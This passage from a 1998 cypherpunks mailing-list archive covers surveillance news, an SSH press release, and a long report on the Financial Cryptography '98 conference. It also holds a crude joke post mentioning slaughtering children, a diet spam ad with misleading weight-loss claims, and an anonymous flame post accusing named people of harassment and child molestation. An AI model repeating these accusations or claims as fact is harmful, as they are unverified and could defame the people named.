~ If you disagree, vote by dialing 1-800-EAT-SHIT

I think I should go down to a local school and start randomly 
slaughtering the children.
~ If you agree, vote by dialing 1-800-EAT-SHIT
~ If you disagree, vote by dialing 1-800-EAT-SHIT

I think I should monitor the electronic communications of every person
on the face of the earth, in order to protect them from themselves.
~ If you agree, vote by dialing 1-800-EAT-SHIT
~ If you disagree, vote by dialing 1-800-EAT-SHIT

I think I should attempt being elected the leader of the most 
influential country in the free world, by kissing the asses of the
money and power mongers.
~ If you agree, vote by dialing 1-800-EAT-SHIT
~ If you disagree, vote by dialing 1-800-EAT-SHIT

NOTE: If you don't have a phone, you become a guest on a TV talk show
where I am appearing, and cheer or boo me, according to your wishes.

Remember: Your opinion matters...NOT!

EatShitMonger






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 28 Apr 1998 11:34:17 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Quantum Snooping
Message-ID: <199804281834.OAA18494@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


New York Times' Markoff reports today on the latest in quantum 
computing, some of which was discussed here recently. Two
points of note:

IBM recently made a "snapshot" of the entire worldwide Web,
eight trillion bytes of data, for an experimental database for 
searching and unnamed other manipulation by its quantum 
computers. Searching the database for a word by conventional 
computers would take a month, while quantum devices could
do it in 27 minutes, a Beamer says.

NSA is funding quantum computing at Los Alamos specifically
for cryptographic investigation, "because QC could have
a profound effect on modern cryptography."

Others forms of warp speed snooping are discussed as well.

---------

Restricted:

"Snow Crash" is featured in a hot-selling book on the thought
of the American Left, "Achieving Our Country," by philosopher
Richard Rorty. The book is swell reading on the state of US
thought, culture and politics whatever your disagreeable attitude. 
It's smallish, but for those completely broke and open to copyleft, 
grab it before IBM kicks it offshore:

   http://jya.com/161.htm  (238K)

   http://jya.com/161.zip  (89K)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ken Williams <jkwilli2@unity.ncsu.edu>
Date: Tue, 28 Apr 1998 11:46:01 -0700 (PDT)
To: cypherpunks@toad.com
Subject: hacking smartcards
Message-ID: <Pine.SOL.3.96.980428144447.10203A-100000@c00986-224wi.eos.ncsu.edu>
MIME-Version: 1.0
Content-Type: text/plain



Hello,

http://cuba.xs4all.nl/~hip/

nice info, ideas, and website.

Regards,

Ken Williams

ORG: NC State Computer Science Dept   VP of The E.H.A.P. Corp.   
EML: jkwilli2@adm.csc.ncsu.edu        ehap@hackers.com             
WWW: http://152.7.11.38/~tattooman/   http://www.hackers.com/ehap/ 
PGP: finger tattooman@152.7.11.38                       







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mia Westerholm <Mia.Westerholm@DataFellows.com>
Date: Tue, 28 Apr 1998 07:18:00 -0700 (PDT)
To: F-Secure-Press-Global@DataFellows.com
Subject: Data Fellows Strikes a Major Deal
Message-ID: <3.0.2.32.19980428153940.00ab5c20@smtp.DataFellows.com>
MIME-Version: 1.0
Content-Type: text/plain


Data Fellows Ltd.  Media Release

For immediate release
28 April 1998

DATA FELLOWS STRIKES A MAJOR DEAL
A Prominent Scandinavian Telephone Operator Invests in Data Security 

Helsinki, Finland, April 28, 1998  -- Data Fellows, a leading provider of
Internet security solutions, has made a deal with the largest private
telephone company in Finland.  Helsinki Telephone Corporation has bought
F-Secure SSH to enhance the security of its Kolumbus Internet services over
public networks. Kolumbus is one of the largest providers of commercial
Internet services in Finland.

"Data security is a highly important consideration for us," says Mr. Vesa
Perttunen, Development Manager from Helsinki Telephone Corporation,
Kolumbus Services. "We evaluated the data security products available on
the market, and F-Secure SSH was the best we could find.  We particularly
appreciated the fact that the source code is available to us."

Says Mr. Tatu Vehmas, Sales Manager, from Data Fellows: "F-Secure SSH
leaves no room for security compromises.  Furthermore, it is the only
sensible tool for secure remote systems administration currently available
on the market. We are pleased that Kolumbus Services has chosen our unique
F-Secure SSH package."

The F-Secure SSH Package

F-Secure SSH products are based on the SSH security protocol. The SSH
protocol is an application level protocol with strong public key
authentication and 128-bit encryption.  It guarantees the simultaneous
authentication of both ends of the connection, the secrecy of the
transmitted information, and the integrity of the transmitted data.

F-Secure SSH Terminal provides the user with secure login connections over
untrusted networks.  It acts as a replacement for the telnet protocol.
F-Secure SSH Terminal fully supports VT100 terminal emulation.

F-Secure Tunnel creates a local proxy server for remote TCP/IP services.
The service can be one of the Internet protocols, pop, smtp (used by e-mail
software), http (used by Web browsers), etc., or almost any other TCP/IP
based service.  The local proxy server listens for a socket on the desired
port and forwards the request and data over the secure channel.  It then
instructs the F-Secure SSH Server to make the connection to the specified
service on the remote machine.

In addition to secure terminal connections and TCP/IP connection forwarding, 
F-Secure SSH Server provides tools to replace existing rsh, rlogin, rdist,
and telnet protocols.  These tools enable administrators to carry out all
remote systems administration tasks over secure connections.

About Helsinki Telephone Corporation

Helsinki Telephone Corporation is the largest local, private telephone
company in Finland.  It is one of the cornerstones of the Finnet Group, a
consortium of 46 private local telephone companies. Helsinki Telephone
Corporation has expertise in the entire range of telecom services, from the
fixed network through data services to mobile telephony.  Through the
Finnet Group, Helsinki Telephone Corporation provides services throughout
Finland.  It has also extended its services abroad through co-operative
agreements with leading international operators. 

More information about Helsinki Telephone Corporation can be found at: 
http://www.hpy.fi

More information about Kolumbus Services can be found at: 
http://www.kolumbus.fi

More information about Finnet can be found at:  
http://www.finnet.fi

About Data Fellows

Data Fellows is one of the world's leading developers of data security
products with offices in San Jose, California and Espoo, Finland. Its
groundbreaking F-Secure product family is a unique combination of globally
available, strong encryption and revolutionary anti-virus software.  The
integrated F-Secure product range provides a complete security solution for
enterprises, and includes file encryption and IPSec communication
encryption products, VPN gateways, SSH based secure remote management
software, and a full range of anti-virus products to workstations, servers
and gateways.  Data Fellows is also the developer of the award winning
F-PROT Professional anti-virus, now part of the dual scanning engine
concept of F-Secure Anti-Virus.   

Data Fellows is privately owned.  Since it was founded in 1988, its annual
net growth of net sales has been over 80%.  Data Fellows offers a worldwide
network of technical support, training and distribution in over 70 countries. 
Data Fellows belongs to an elite group of companies that have a
triple-A rating from Dun&Bradstreet.

More information about Data Fellows and its products can be found at:
http://www.DataFellows.com


For further information, please contact:

Data Fellows Ltd.
Mr. Tatu Vehmas, Sales Manager	
Tel.  +358 9 859 900, 
Fax. +358 9 8599 0599
E-Mail: Tatu.Vehmas@DataFellows.com

Mia.Westerholm@DataFellows.com 
http://www.DataFellows.com

Data Fellows Ltd.
PL 24
FIN-02231 ESPOO, FINLAND
Tel. +358 9 859 900
Fax. +358 9 8599 0599




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 28 Apr 1998 17:27:13 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Wiretap Docs
Message-ID: <199804290027.UAA10618@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Cellular Telecommunications Industry Association suit against
the FBI over disputed wiretap requirements of CALEA:

   http://jya.com/ctia-fbi.htm  (19K)

The FBI's definition of "upgrade" and "modification" for CALEA
wiretap requirements, Federal Register, April 28, 1998:

   http://jya.com/fbi042898.txt  (60K)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 28 Apr 1998 19:06:14 -0700 (PDT)
To: cypherpunks@toad.com
Subject: ECHELON 1988
Message-ID: <199804290206.WAA28591@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Duncan Campbell has provided his 1988 article on
the NSA ECHELON global surveillance system,
one of the earliest accounts:

   http://jya.com/echelon-dc.htm

Duncan, who was hounded in court for years by the 
UK gov for allegedly revealing official secrets, provided 
substantial  support to James Bamford for "The Puzzle 
Palace." 

He was interviewed about ECHELON on French TV
yesterday. See his most informative Web site for 
investigative reporting:

   http://www.gn.apc.org/duncan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 28 Apr 1998 15:37:06 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Gary Lee Burnore and His Anti-Privacy Zealots are on the Warpath!
In-Reply-To: <6gobin$ctl$1@camel20.mindspring.com>
Message-ID: <199804282237.AAA23738@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


William J. McClatchie <wotan@databasix.com> wrote:
 
> >Anti-privacy kooks like you and DataBasix CEO Gary Lee Burnore are one of 
> >the best arguments for the existence of anonymous remailers.  You and your
> >friends at DataBasix have a hard time bullying and harassing people into
> >silence that you can't identify, don't you?
>  
> And assholes like yourself are the best argument for *banning* remailers.
> They serve a purpose.  Unfortunately, to meet the purpose means that
> assholes are also given access to the service.

Your own record of harassing remailers is well known, McClatchie.  Calling
remailer users "assholes" and calling for content-based censorship only
underscores your anti-privacy agenda.  If remailer users posted only what
was popular and politically correct, there would be little need for
remailers.

One remailer operator who was forced to shut it down mentioned your name
quite prominently, BTW, in providing details about the attack.

> It was someone using a remailer to harass Wells Fargo management.

Can you document this?
 I never read a single post from anyone claiming to
speak for Wells Fargo management which has substantiated this.  Nor did
any of the remailer operaters involved mention having received such an
official complaint from member of Wells Fargo's management.  So all we
have is you parroting Burnore's original unsubstantiated allegations.

Isn't it interesting that when something offends Gary Burnore he often
resorts to "defending" phantom victims of the alleged "abuse"?  And shortly
thereafter, various of his sock puppets echo his whining chant.

> It was someone using a remailer who has spambaited several hundred
> email addresses.

And one such post contained Gary Burnore's own .sig block still appended to
an otherwise anonymous post.  Oops!

> It was someone using a remailer who wants to know if Gary Burnore's  
> current employer knows of his background.  And if not, how could they
> be contacted.
>
> It was someone using a remailer who posted, in direct violation of NC law
> information in its registry for the sole purpose of harrassing someone.

Please cite the NC law which you claim is being violated, and how it would
apply to a remailer located outside of NC?  Would you also say that
remailers ought to censor their content to avoid other laws being broken,
such as insulting the religion of Islam, publishing information about birth
control, abortion, etc.?  If not, why should a foreign remailer selectively
enforce this one law in NC (if it even exists)?

Telling people that the website exists and that a search for "Gary Lee
Burnore" on it might yield a match is not more "harassing" than the site
itself.  If they didn't want people to access this data, why publish it on
a public website?  The whole purpose of the website it apparently to let
people to know who the registered sex offenders are in NC and where they
live.

If someone snail mailed you something you considered "harassing" and
included no return address, would you accuse the sender of trying to get
the postal service shut down?

Wow, McClatchie.  I guess you have a point.  If you and Gary claim that all
that happened, and that it was done by someone outside of DataBasix, then I
guess we should believe it and shut down all the remailers just to make
sure they aren't abused...

But the fact is that all too often in the past, designer "abuse" would just
automagically appear at critical times when Gary Burnore and Belinda Bryan
were making demands (privately, via e-mail) on another remailer operator.
How would someone outside of DataBasix have known that?  How would someone
other than a DataBasix insider have gotten access to the complete list of
DataBasix' clients and employees in order to allegedly "spam bait" them, as
Belinda claimed?  Your own involvement in all of these attacks seems to
more than just coincidental.

Speaking of abuse and harassment, Gary Burnore demanded that Jeff Burchell
turn over to him all of his remailer logs containing the e-mail addresses
of everyone who had either sent or received anonymous e-mail through the
server.  Yet Gary refuses to disclose how such a list would have been used.
Fortunately for the remailer user community, no such data was ever
collected.

> >Lest anyone forget, Gary launched his first tirade against anonymity when
> >someone tipped off his molestation victim's mother and school officials
> >anonymously.
>  
> No, one of his first complaints about remailers was after someone used one
> to harass his SO of the time, and her daughter.  They had committed the
> heinious crime of knowing Gary.

Most women would not consider it "harassment" to be informed that their
daughters were being molested.  Nor did she complain.  Gary did!  How nice
of the perpetrator to be so considerate of his victim's mother and not want
to have her "harassed" by knowledge of what Gary was doing to her daughter.
Ignorance is bliss, huh?

Gary's motives were finally revealed when he was CONVICTED for that very
crime.  How would a random harasser have even known of Gary's sexual
activities involving minors, before he was arrested and convicted?  How
would he/she know the victim's gender, age, identity, and city of
residence?

> >Whistleblowing has always been one of the important functions
> >of anonymous remailers.
>  
> Uh huh.  And we've seen real "whistleblowing" activity here.  

Apparently so, when the perpetrator of the crime is the only one who
complains about being exposed.  In case it has escaped your attention, Gary
complained PUBLICLY about a PRIVATE e-mail message to his victim's mother.
If telling a mother that her daughter is being molested isn't
whistleblowing, what is?

> Seen plenty
> of abuse.  Seen postings of such a vile nature from remailers that when
> people made similar postings from traceable accounts, their ISP's
> terminated them.  And it was not becuase of content - but becuase the
> messages were harassing, in both nature and intent.

TRANSLATION: Anything with which the fine folks at DataBasix disagree tends
to be called "harassment" and "abuse".  As for intent, the accuser has the
burden of proof, there.

But consider this: if even mentioning Gary's sexual activities with minors
is "vile", what does that make Gary for actually committing them?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lose20lbsin2wks@juno.com
Date: Tue, 28 Apr 1998 21:40:41 -0700 (PDT)
To: <cypherpunks-unedited@toad.com>
Subject: Lose 20 pounds in 2 weeks
Message-ID: <199804290340.FAA20896@alenka.bva.czn.cz>
MIME-Version: 1.0
Content-Type: text/plain




                Marketing Services Interests - Diet

               Eat all the Chicken, Fish, Lamb, Pork 
                 or Steak that you want while you..

                     LOSE 20 LBS IN 2 WEEKS


* Sound too good to be true?  The diet works.

* The amount of food taken in is not important.

* After you lose the weight you simply watch your diet.

* It is important to consult your Dr. before starting this Diet.


Interested!
__________________________________________

To receive a copy of the Diet, Mail Your
Check or Money Order for $5.95 To:

MSI
PO BOX 190685
Mobile, AL 36619

Name  ___________________________________________

Address  ________________________________________

         ________________________________________

E-Mail Address  _________________________________







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@REPLAY.COM>
Date: Tue, 28 Apr 1998 21:32:06 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Anonymity, FC '98, and escrowed paper shredders
In-Reply-To: <199804280035.UAA08887@mgoblue.research.att.com>
Message-ID: <199804290355.FAA13754@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Avi Rubin writes:

>    http://www.itd.nrl.navy.mil/ITD/5540/ieee/cipher/

Most interesting from a cypherpunk point of view.

"Matt Blaze expressed an interesting analogy in describing a paper
shredder that created a digital copy of a document and sent it off to
a central database. When a document was accidentally shred, the user
could contact the database and have a copy faxed."

Mentions of anonymity contain an anonymous poster to cypherpunks, an
anonymizer inside the FBI's intrusion detection program, AAAS proposal
to use remailers to defend human rights, toll collection and mass
surveillance in New Jersey, trustees and anonymity-revocation in
payment schemes, policy issues for anonymizing services and discussion
of onion routing at a spookish security conference.

Finally, good manners or not, here's Paul Syverson's must-read item on
FC '98 for those of us who couldn't go:

----------------------------------------------------------------------
The second annual Financial Cryptography Conference (FC98) was held in
Anguilla in the British West Indies on February 23--26, 1998.  The
conference was a rousing success, Attendance was up with over 100
participants from business, academia, and government with interests
in cryptology, computer security, and/or the financial industries.  A
governing body over the conference was introduced, the International
Financial Cryptography Association, and held its first meeting,
electing a board consisting of Vince Cate, Bob Hettinga, Ray
Hirschfeld, Lucky Green, and Ron Rivest.

The presentations were interesting and well attended, no mean feat
considering the Caribbean diversions that surrounded the participants.
The quality was probably best summed up by David Chaum who remarked on
the last day, ``I can't remember the last time I sat through an entire
session much less a whole conference, but I came to every paper here.''

The following description will focus on the official program. This
means that it will deal almost entirely with presentations by
cryptology and computer security researchers. Unlike last year, there
were no papers presented by members of the financial community or
policy experts. Those contributions occurred entirely in presentations
and panels that were not part of the official program.  This was
unfortunate. Given the available distractions, these unofficial
sessions were much less well attended. The ones I did attend were very
instructive in understanding the financial side of financial
cryptography. Had they been part of the official program, there might
have been even more of a dialogue between the two sides that give the
conference its name. Which is not to say that interaction was minimal,
far from it. But the official dialogue was a bit one sided. (A much more
off-program description of the conference can be found at
http://www.live.co.uk/ftvfr398.htm )

The conference opened with welcoming remarks from the chairs and from
Victor Banks, the finance minister of Anguilla. He noted that Anguilla
was well suited as the site of the conference, observing that it may
have more web pages per capita than anywhere else in the world. He also
noted that revolutions, particularly bloodless revolutions, do well in
Anguilla. And, like their own revolution in the late 1960s, he held
high hopes for the revolution in electronic commerce at the forefront
of which one can find this conference.

The first session began with a paper on ``Micropayments via Efficient
Coin-Flipping'' by  Richard Lipton and Rafail Ostrovsky.  The goal is
to minimize communication: number of rounds, number of bits sent,
hardware requirements, fraud, and computational requirements.  In this
scheme a coin-flip protocol is performed on the links of preprocessed
hash chains formed independently at the vendor and the customer. Coin
flips resulting from the chain results will only infrequently indicate
a payment. The bank participates only when a payment is required. This
is somewhat similar to Rivest's ``Electronic Lottery Tickets as
Micropayments'' which was presented at last year's rump session and was
published in the final proceedings (which are now available from
Springer). However, as Ostrovsky later explained at the rump session.
the two are not the same. One difference is that, roughly speaking,
Rivest's scheme backloads the winning result onto the lottery protocol,
while the Lipton-Ostrovsky scheme frontloads the winning result.

The next paper was ``X-Cash: Executable Digital Cash'' by Markus
Jakobsson and Ari Juels. The basic idea is to have applets carrying
cash that they can spend under appropriate conditions. The contribution
of the paper was to show how to do this in such a way that the applet
cannot easily be pickpocketed by an attacker or hostile host.

The first session ended with ``Distributed Trustees and Revocability:
A Framework for Internet Payment'' by David M'Raihi and David
Pointcheval.  One goal is to relax constraints on usual trust model and
reduce trust assumptions of previous work. One may adopt different
approaches to the use of trustees: trustee in every transaction,
trustee just at account opening, or trustee only in
anonymity-revocation. The paper combines the last two of these. It is
based on the use of smartcards with user pseudonyms. The paper also
makes use of a threshold approach to anonymity revocation so that
honest users get assurance of privacy against a (small number of)
compromised trustees.

David Maher presented ``A Platform for Privately Defined Currencies,
Loyalty Credits, and Play Money''. This was also a smartcard scheme.
But, the idea is to have a fairly generic smartcard on which a number
of different private currencies could easily be maintained.  He
sketched a number of potential applications: vendor loyalty points,
corporate scrips, and monetary values for virtual environments like MUDS
and interactive games. The idea is to have the currencies be easily
defined and implemented as well as fungible with more ordinary
currencies. It seems like a very interesting idea; although some in the
audience questioned whether vendors would want to be bothered with the
infrastructure overhead.

``Assessment of Threats for Smart Card Based Electronic Cash''
was the next paper, by Kazuo J. Ezawa, Gregory Napiorkowski.
It prompted lots of detailed questions. As was noted by Ron Rivest
during questions, the threat model was someone trying to get money
out of Mondex by counterfeiting cards rather than say
a competitor trying to undermine confidence in the Mondex
system. This was acknowledged as the focus of the work.

The last paper of the day was ``Using a High-Performance, Programmable
Secure Coprocessor'' by Sean W. Smith, Elaine R. Palmer, Steve Weingart
The talk nicely outlined all the problems in developing building
deploying, and updating (the software on) secure coprocessors.

Gene Tsudik kicked off the Tuesday program talking about ``Secure Group
Barter: Multi-Party Fair Exchange with Semi-Trusted Neutral Parties'',
which he wrote with Matt Franklin.  The Franklin-Tsudik approach uses
unbalanced verifiable secret sharing to increase efficiency. They
reduce all types of multiparty exchange to single unit cyclic exchange.
In the multiparty case, principals will get what they want. But,
principals may not know from whom they get it.  Cyclic order is hidden
by the STNP, and it does not necessarily know the size of the group.

The next paper was ``A Payment Scheme Using Vouchers'' by Ernest Foo
and  Colin Boyd.  The voucher approach uses the same payment principals
as other approaches: the customer, the bank, and the merchant.  The
main difference is that it reverses the usual payment cycle.
-bank and merchant create a voucher
-merchant sends the voucher to customer (including encrypted goods)
-customer sends voucher with cash to the bank
-bank evaluates voucher
-bank informs merchant and
-bank releases voucher to customer
Vouchers are made only when merchant wants to make a new product Then
they sit on the ftp site and wait for customers.  Efficiency was
claimed over, e.g., Netbill and iKP Also, there is no online processing
by merchant.  Like Netbill, goods are part of the protocol, not just
cash is sent. One can have customer anonymity via anonymous ftp, but
not anonymity from the bank.  Detailed comparison was given of the
number of messages, symmetric encryptions, the location of computation,
signatures, etc.  It was noted that this scheme is  not as efficient as
some of the micropayment schemes. Also, it goes against the usual
network thinking by placing load at the bank. But, it requires less
work by the merchant. A question was raised about static vs. dynamic
products This scheme only allows static (predetermined) products.

The next paper was ``A Formal Specification of Requirements for Payment
Transactions in the SET Protocol'' by  Catherine Meadows and Paul
Syverson.  SET is the proposed industry standard for credit card
transactions on the Internet. This paper gave an overview of the
payment part of SET.  Requirements were given in NPATRL (the NRL
Protocol Analyzer Temporal Requirements Language) for analysis using
the NRL Protocol Analyzer.  Modifications and additions to NPATRL
needed to formalize requirements for SET were also described.

Markus Jakobsson presented a position paper written with Moti Yung
entitled ``On Assurance Structures for WWW Commerce''.  The motivating
question was, ``What is left to do to facilitate trade over the
Internet?'' The current environment was claimed to be characterized by
lawlessness, changing identities, and gang wars, where one must be
careful carrying cash, and there are no road signs. Basically, they
compared the World Wide Web with the wild and wooly west.  (Within this
the western theme Markus described the good, the bad, and the ugly of
what is on the Web.) Main components of the infrastructure needed are
the access structure, for people to find the goods and services they
need, the trust structure to facilitate trust between customers and
merchants. Also needed are protections in other contexts. Anonymity,
freedom from profiling, prevention of access to information, and
[forced access to information] i.e., direct marketing, were all raised.
Basically the need for both individual and institutional rights.
Finally they noted the need for a means for maintaining the structure
of assurances. They also considered the economic, legal, and other
impediments to providing these needs.

The next program elements was a panel discussion on the Mechanics and
Meaning of Certificate Revocation moderated by Barb Fox(BF).  Other
panelists were Joan Feigenbaum(JF), Paul Kocher(PK), Michael Myers(MM),
and Ron Rivest(RR).

BF began by characterizing revocation as the undoing of a persistent
signed statement.  The reasons could be either key compromise or some
sort of relationship binding failure, either a key to an identity or an
identity to a CA (certification authority).

Questions for panel given were:  Can X.509 work? What are the
alternative CRLs? And, what about revocation across PKIs?  Other
questions were: Who owns a certificate?  Who pays for revocation? What
is the relationship between revocation and trust management? Finally,
should we wait for legal mechanisms?

MM noted that we can't solve all the problems today, but major
corporations want to use this today to manage their risk. There is
also nonrepudiation and other issues besides risk management. He noted
that a CRL can be good for many needs even if it is just a blacklist,
and CRLs are well position in architectures today. But, on the other
side he noted their large size and inability of the basic approach to
handle timeliness effectively. The alternative of short lived
certificates take advantage of existing mechanisms and are easy to
deploy within an enterprise. But, the don't scale well; it must be
decided for how long they are valid. Thus, it is somewhat a case of
just moving the bandwidth elsewhere. He also mentioned pros and cons of
on-line and off-line approaches.

PK claimed that revocation is needed to make public key crypto automatic.
Solutions must consider security, scalability, performance,
memory (smartcards), bandwidth, auditability, practicality wrt
what is currently available, secure manageability, and simplicity
(e.g., should use standard crypto).
CRLs fail at least wrt reliability, scale, performance, memory, bandwidth,
and  practicality (applications don't know where to get CRLs from).
Valicert's approach is to use Certificate Revocation Trees and he
claimed that these meet all the requirements.

RR gave his position as one favoring no certificate revocation.
Certificates support a signed message/request.  Freshness matters to
acceptor (more than the CA), so freshness requirements must be set by
the acceptor not the CA.  Corollary: periodically issued CRLs are
wrong.  E.g., a badge checker wants at most day old badge information
but CRLs come out once a week.
He then gave the SDSI model in which the signer must get the freshness
evidence, not overworked server.  And, the simplest freshness check is
a (more) recently issued certificate.  He noted that key compromise is
different.  Who controls a key's good/compromised bit?  He noted that
the  PGP suicide note is no good in the case a where a key is
deliberately shared.  He proposed a network of suicide bureaus with
which you register when obtaining a public key. Suicide notes can be
sent to any suicide bureau from which it will quickly be disseminated
to all.  This means that you can obtain a health certificate from the
bureau with which you registered saying that you indeed are registered
and no evidence of problems with your key has been received.  He ended
with a bit of advice from the grammar and style classic by Shrunk and
White: always go positive when you can.

JF said that she agreed with everything Ron said especially, put it in
positive terms. She noted that the cost of infrastructure maintenance
is crucial. Fast cross PKI checks will be expensive, but probably can
be minimized.

After basic positions were given the panelists all generally agreed on
things ;>). For example, Matt Blaze (one of JF's co-creators of
Policymaker) asked, ``Is it worth it to build this whole infrastructure
to have certificate revocation?'' MM responded that there isn't much
infrastructure difference between revocation and validation. To which
JF responded, ``No. There's a big difference.''

David Aucmith pointed out that devices (not people) often carry
keys. And, they can't make suicide decisions. For them
CRLs are important. This was one question for which
I didn't hear a good answer to, although something akin to
Rivest's suicide bureaus might also be able to handle this.
Presumably if evidence of compromise has arisen somewhere, then
the device will not be able to obtain a certificate of health
when needed. It's inability to function should then ultimately
attract the attention of a human who can then decide to obtain
a new key for the device.

Someone else raised that CRLs are a mechanism for managing changing
trust, but why should we think that this one mechanism can handle all
the trust management available from public keys?  If there is evidence
that my key was compromised two weeks ago, I can incorporate that in a
CRL, but how could you do this on the positive approach?  It can't go
back in time like a CRL can.  Ron Rivest said that this was a tough
problem and he didn't know the answer. But he added, "that's what
juries are for."

After dinner Tuesday night was the first meeting of the
International Financial Cryptography Association (IFCA).
As mentioned above, a governing board was elected. The other
main topic of business was where to hold future conferences.
After much animated discussion it was decided that the conference
would stay in Anguilla for at least the near term.

Following this, there was a rump session.

John Kelsey described cryptanalysis of the SPEED Cipher (work done with
with Wagner, Hall, and Schneier). The SPEED cipher was introduced at
FC97 by Yuliang Zheng. He observed that the interesting part was  the
cryptanalysis that fails.  The obvious differential attack doesn't
work.  Instead they use a related key attack.

Ian Grigg announced NISI Advanced Encryption Standard Support They will
do the JAVA implementation for any algorithm that anyone wants because
NIST wants 3 implementations for standards including one in JAVA.
They're the middle men. They need volunteers to do it.

Stephan Overbeek described the N-count value Analyzer.
It is based on one-way chaining in smart cards.  Value is in the
number of chain links revealed (reversed).  The claimed main difference
is that the 1-way chain is specific to a terminal rather than the user.
It was claimed to be fast and good for micropayments.

Cathy Meadows gave a quick overview of the NRL Protocol Analyzer,
an interactive Prolog based tool for analyzing cryptographic protocols.
It examines a protocols by starting in a final state and searching
backwards to see if it is possible to reach an insecure initial state.
It is thus like a model checker. But unlike a model checker, it sometimes
analyzes infinite state spaces, which it does by facilitating the proving
of lemmas (like a theorem prover) that allow pruning of infinite chunks
off the search space.

Alain Mayer described policy issues for running an anonymizing service.
He raised three general problems that might arise, not necessarily
specific to Lucent's LPWA.
-Your service is used for a(n attempted) break-in at another site.
-somebody posts threats or insults on a message board via your service.
-a site asks you to block access from your service to the site.
I noted that all three of these had actually occurred with our Onion
Routing prototype, and that at the time we were struggling with general
policy solutions to these problems. (We have since formulated a policy,
which is posted on our Web site. LPWA has also posted a policy statement
at http://lpwa.com:8000/policy.html )

Rafi Ostrovsky explained why Rivest's Lottery scheme is not equal to
the Lipton-Ostrovsky given on Monday. The difference has been described
above in the synopsis of his Monday presentation.

Paul Syverson presented Weakly Secret Bit Commitment. I gave an example
of an exchange protocol with no trusted third party where the
principals are not forced to be fair but rather where their incentive
to proceed outweighs their incentive to cheat.

Jon Ziegler described the Java Ring, which is Java running on a Dallas
semiconductor iButton. Amongst other nifty features, it does garbage
collection so you can delete applets when their done.

David Goldschlag presented Security Models for content.  This was an
overview of the Divx approach to, e.g., ``renting'' movies, in which
the rental period starts when the movie is first played rather than
when it is obtained and there is no need to return the DVD. To allow
you to `re-rent' the disc the DVD player has a dialup connection to a
backend system.  The DVD player logs the disc serial number of played
discs and reports the log periodically to the backend (offline).  If
you prevent the player from calling in for a long time it will lock up.
Questions were raised about privacy.  David responded that release of a
customer profile is better protected than at conventional video rental
chains where the cashier has your profile rather than an access
protected billing service.

Stuart Stubblebine presented On Revocation. This was roughly improved
or extended versions of Rivest's principles (given during panel, c.f.,
above). The principles were related to his own work on recent security
and metrics of authentication.  One example, Rivest principle:
Freshness requirements must be set by acceptor not a CA.  This was
amended to: Freshness requirements must be set by all entities relying
on them.

Bob Green described what it was like to be a Programmer Living in Anguilla.
This wasn't really on the topic of the conference. But, it gave a fascinating
glimpse of what it is like to work in Anguilla. Some advice and comments
gleaned from the talk. If you want to move here, bring two of everything
that can break. Officially on paper, you can't move, so you just do it.
If you fix somebody's PC there, you now know their whole family.
And, since there are only a handful or so of families on the island,
you get to know everybody pretty quickly.

Bob Hettinga presented Market model for bearer certificates.
He suggested that we should base it on the old physical bearer bond model.
Major Claim: even if you issue a bearer certificate at every exchange,
that's still cheaper than, e.g., seven years of credit card audit
trails.

Steve Schear rounded out the evening with a description of First E-Cache.

Wednesday morning began with an invited talk by David Chaum, who I
think could reasonably be called the undisputed father of financial
cryptography.  The title of his talk in the preproceedings was
``Private Signatures and E-commerce''; however, the title on his
opening slide was ``Which Flavor Will Win in the `Way-More-Digital'
World''. This brief writeup can only sketch some of the many topics
on which he touched.

There were two foci to his talk, info technology policy issues
and privacy, particularly in payments.

His policy overview covered three areas.  (1) commons issues: free
bandwidth has had a positive effect on cyberspace growth (2) consumer
protection: false privacy?  (3) human rights: next wave of fundamental
human rights is informational rights.  Consumer protection and
bandwidth intersect at junk mail and push technology.  Consumer
protection and human rights intersect at the consumer platform and
interface. And, bandwidth and human rights intersect in the area of
message encryption secrecy. In the intersection of all three is access
-- interaction security (people have to be able to protect their
interests in cyberspace). He went on to describe both the problems and
facilitating factors of establishing interaction security.

He began his discussion of privacy by noting:  The consensus of the
heads of major technology companies, Greenspan, others is that consumer
confidence in privacy protection is the major reason that e-commerce
hasn't taken off. In fact, surveys even show that people are generally
expecting increased privacy from e-commerce vs. current commerce.  He
then explained some of the drawbacks of e-commerce using conventional
payment mechanisms such as credit cards and explained how blind
signatures enable one-way private e-cash.  He felt it was quite
important to stress that it is one-way privacy not anonymity, as is
often said in the media.  In other words, nobody can without your
agreement know where you spent your money BUT, you can always prove
with the bank's help who received any payment, as well as when and for
how much.

His conclusion was that there were forces moving us in two directions.
flavor #1: an all traceable nonrepudiable more-centralized world, and
flavor #2: an expanding decentralized informational-rights world
(the good one).  He didn't say definitively which way things would go,
but he felt that work such as done by the attendees of this conference
would help push in the right direction.

A fascinating claim that he made during questions, but on which he did
not have time to elaborate was that, with the various cryptographic and
other mechanisms  he had described in his talk, the possibility exists
to virtually eliminate of organized crime.

The conference continued with ``Group Blind Digital Signatures:  A
Scalable Solution to Electronic Cash'' by Anna Lysyanskaya and Zulfikar
Ramzan, who split the presentation duties.  Their model is of a central
bank with smaller banks that users choose. The goal is to make the
Goal: identity of the user and of the user's bank anonymous to the
vendor and the vendor's bank (only the central bank can find out the
issuing bank of a piece of e-cash. And, no bank (even central) can
issue cash in another bank's name. The scheme is online, hence somewhat
 expensive. But it can be made offline if we compromise a degree of
 user anonymity.

Before the next session Ian Goldberg announced that he had a 100 byte program
